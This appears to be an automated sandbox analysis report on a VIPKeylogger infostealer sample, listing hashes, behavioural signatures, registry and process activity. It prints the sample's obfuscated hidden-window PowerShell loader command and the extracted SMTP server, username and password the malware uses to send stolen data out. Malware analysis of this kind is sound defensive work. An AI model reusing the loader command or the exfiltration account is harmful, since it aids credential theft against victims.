Analysis
- max time kernel: 141s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-10-2024 01:07
Tasks
- Static task static1
- Behavioral task behavioral1: Sample 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe, Resource win7-20240708-en
- Behavioral task behavioral2: Sample 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe, Resource win10v2004-20241007-en
- Behavioral task behavioral3: Sample Levitator/Exungulate.ps1, Resource win7-20240708-en
- Behavioral task behavioral4: Sample Levitator/Exungulate.ps1, Resource win10v2004-20241007-en
General
- Target: 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe
- Size: 870KB
- MD5: a1e239c4d5116e289ce0597a92844ede
- SHA1: 4562d452ccc32512291c3165a0b9b3c076b28094
- SHA256: 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
- SHA512: 500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
- SSDEEP: 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
Malware Config
- Extracted
  Protocol: smtp
  Host: smtp.ionos.es
  Port: 587
  Username: [email protected]
  Password: pW@4G()=#2
- Extracted (family: vipkeylogger)
  Protocol: smtp
  Host: smtp.ionos.es
  Port: 587
  Username: [email protected]
  Password: pW@4G()=#2
  Email To: [email protected]
Signatures
- VIPKeylogger
  VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Runs PowerShell with the display window hidden.
  Processes:
    pid  | process
    2720 | powershell.exe
    740  | powershell.exe
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
- Blocklisted process makes network request (14 IoCs)
  Processes:
    flow | pid  | process
    22   | 3468 | msiexec.exe
    23   | 4232 | msiexec.exe
    25   | 3468 | msiexec.exe
    26   | 4232 | msiexec.exe
    29   | 3468 | msiexec.exe
    30   | 4232 | msiexec.exe
    32   | 3468 | msiexec.exe
    33   | 4232 | msiexec.exe
    35   | 4232 | msiexec.exe
    36   | 3468 | msiexec.exe
    56   | 4232 | msiexec.exe
    62   | 4232 | msiexec.exe
    67   | 4232 | msiexec.exe
    73   | 4232 | msiexec.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    55   | checkip.dyndns.org
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes:
    pid  | process
    4232 | msiexec.exe
    3468 | msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
  Processes:
    pid  | process
    740  | powershell.exe
    2720 | powershell.exe
    3468 | msiexec.exe
    4232 | msiexec.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoCs)
  Processes:
    pid  | pid_target | process      | target process
    4948 | 3468       | WerFault.exe | msiexec.exe
- System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes:
    pid  | process
    740  | powershell.exe
    740  | powershell.exe
    2720 | powershell.exe
    2720 | powershell.exe
    740  | powershell.exe
    740  | powershell.exe
    740  | powershell.exe
    740  | powershell.exe
    740  | powershell.exe
    740  | powershell.exe
    2720 | powershell.exe
    2720 | powershell.exe
    2720 | powershell.exe
    2720 | powershell.exe
    740  | powershell.exe
    2720 | powershell.exe
    4232 | msiexec.exe
    4232 | msiexec.exe
- Suspicious behavior: MapViewOfSection (2 IoCs)
  Processes:
    pid  | process
    2720 | powershell.exe
    740  | powershell.exe
- Suspicious use of AdjustPrivilegeToken (45 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 740 | powershell.exe
    Token: SeDebugPrivilege | 2720 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 740 | powershell.exe
    Token: SeSecurityPrivilege | 740 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 740 | powershell.exe
    Token: SeLoadDriverPrivilege | 740 | powershell.exe
    Token: SeSystemProfilePrivilege | 740 | powershell.exe
    Token: SeSystemtimePrivilege | 740 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 740 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 740 | powershell.exe
    Token: SeCreatePagefilePrivilege | 740 | powershell.exe
    Token: SeBackupPrivilege | 740 | powershell.exe
    Token: SeRestorePrivilege | 740 | powershell.exe
    Token: SeShutdownPrivilege | 740 | powershell.exe
    Token: SeDebugPrivilege | 740 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 740 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 740 | powershell.exe
    Token: SeUndockPrivilege | 740 | powershell.exe
    Token: SeManageVolumePrivilege | 740 | powershell.exe
    Token: 33 | 740 | powershell.exe
    Token: 34 | 740 | powershell.exe
    Token: 35 | 740 | powershell.exe
    Token: 36 | 740 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 2720 | powershell.exe
    Token: SeSecurityPrivilege | 2720 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 2720 | powershell.exe
    Token: SeLoadDriverPrivilege | 2720 | powershell.exe
    Token: SeSystemProfilePrivilege | 2720 | powershell.exe
    Token: SeSystemtimePrivilege | 2720 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 2720 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 2720 | powershell.exe
    Token: SeCreatePagefilePrivilege | 2720 | powershell.exe
    Token: SeBackupPrivilege | 2720 | powershell.exe
    Token: SeRestorePrivilege | 2720 | powershell.exe
    Token: SeShutdownPrivilege | 2720 | powershell.exe
    Token: SeDebugPrivilege | 2720 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 2720 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 2720 | powershell.exe
    Token: SeUndockPrivilege | 2720 | powershell.exe
    Token: SeManageVolumePrivilege | 2720 | powershell.exe
    Token: 33 | 2720 | powershell.exe
    Token: 34 | 2720 | powershell.exe
    Token: 35 | 2720 | powershell.exe
    Token: 36 | 2720 | powershell.exe
    Token: SeDebugPrivilege | 4232 | msiexec.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes:
    description | pid | process | target process
    PID 3384 wrote to memory of 740 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 3384 wrote to memory of 740 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 3384 wrote to memory of 740 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 3384 wrote to memory of 2720 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 3384 wrote to memory of 2720 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 3384 wrote to memory of 2720 | 3384 | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe | powershell.exe
    PID 740 wrote to memory of 3468 | 740 | powershell.exe | msiexec.exe
    PID 740 wrote to memory of 3468 | 740 | powershell.exe | msiexec.exe
    PID 740 wrote to memory of 3468 | 740 | powershell.exe | msiexec.exe
    PID 2720 wrote to memory of 4232 | 2720 | powershell.exe | msiexec.exe
    PID 2720 wrote to memory of 4232 | 2720 | powershell.exe | msiexec.exe
    PID 2720 wrote to memory of 4232 | 2720 | powershell.exe | msiexec.exe
    PID 2720 wrote to memory of 4232 | 2720 | powershell.exe | msiexec.exe
    PID 740 wrote to memory of 3468 | 740 | powershell.exe | msiexec.exe
- outlook_office_path (1 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
- outlook_win_path (1 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Processes (tree depth in brackets)
- [1] C:\Users\Admin\AppData\Local\Temp\1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe (PID 3384)
  Command line: "C:\Users\Admin\AppData\Local\Temp\1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe"
  Signatures:
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 740)
    Command line: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
    Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\msiexec.exe (PID 3468)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      Signatures:
        - Blocklisted process makes network request
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
      - [4] C:\Windows\SysWOW64\WerFault.exe (PID 4948)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2020
        Signatures:
          - Program crash
  - [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2720)
    Command line: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
    Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\msiexec.exe (PID 4232)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      Signatures:
        - Accesses Microsoft Outlook profiles
        - Blocklisted process makes network request
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
- [1] C:\Windows\SysWOW64\WerFault.exe (PID 3384)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3468 -ip 3468
MITRE ATT&CK Enterprise v15
Downloads